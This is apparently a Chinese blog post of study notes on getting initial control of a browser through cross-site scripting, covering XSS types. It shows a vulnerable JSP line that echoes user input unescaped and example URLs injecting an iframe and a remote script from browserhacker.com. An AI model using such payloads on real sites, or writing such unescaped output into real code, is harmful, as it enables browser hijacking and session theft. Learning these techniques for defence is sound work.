初始化控制

1、1理解初始化控制

获取初始控制权,第一步:寻找机会对目标施加某种程度的影响。所以就要执行设计好的初始化指令。   

具体做法是把初始指令安插进目标浏览器。

采用何种技术实现对目标的控制,取决于攻击的环境。如果使用被盗用的站点,可以通过顺路下载来做(不是很懂)。采用钓鱼式攻击,xss就是最好的选择。

勾连:勾连浏览器始于执行代码。让你宝贵的代码进入浏览器。

2.2、实现初始控制

2.11 、使用XSS攻击

网页的动态语言产生后,恶意代码注入就开始了出现了。

恶意行为最早的形式包括:1、cookie篡改(cookie poisoning)2、暴露敏感信息  3、违背基于来源的安全规则  4、篡改Web表单  5、暴露SSL加密的内容

不可信的内容被处理,然后被当成可信任内容渲染在浏览器后,xss就出现了。    如果这个内容里面包含HTML、JavaScript、VBScript或其他内容,浏览器就可执行不可信代码。

xss分类有很多种。很早就有的反射型XSS和持久型XSS是利用服务器端隐患的,而DOM XSS和通用XSS利用的是客户端的缺陷。

1、反射型XSS

反射型XSS是最常见的XSS,其过程是不可信用户数据提交到一个WEB应用,然后数据在响应中被返回(页面中反射回了不可信内容)。由于浏览器看到的是服务器端的代码所以认为他是安全的,于是就执行了。

与多数XSS一样,反射型XSS受到同源策略的限制。这种情况下的隐患在服务器端代码中。  比如下面是存在隐患的JSP代码:

<% String UserId = request.getParameter("user");%>

Your User ID is <%= UserId%>

这行代码接收用户查询参数,并将参数的内容直接在响应中返回。    利用这种隐患很简单,只要在浏览器地址内输入地址栏内输入一下地址:Http://browservicitim/userhome.jsp?user=<ifram%20src=http://browserhacker.com/></ifram>。执行之后,就可以在页面中插入一个地址为browserhacker.com的框架。

同样,要向浏览器中注入远程JavaScript脚本,只需要欺骗目标访问以下地址:Http://browservicitim/userhome.jsp?user=<script%20src=http://browserhacker.com/></script>。Web应用在处理这个URL时,就会在HTML中返回相应的<script>块。浏览器接收相应,就会在被攻击来源的上下文中执行该脚本。

 

 

 

Guess you like

Origin blog.csdn.net/qq_36737214/article/details/96478504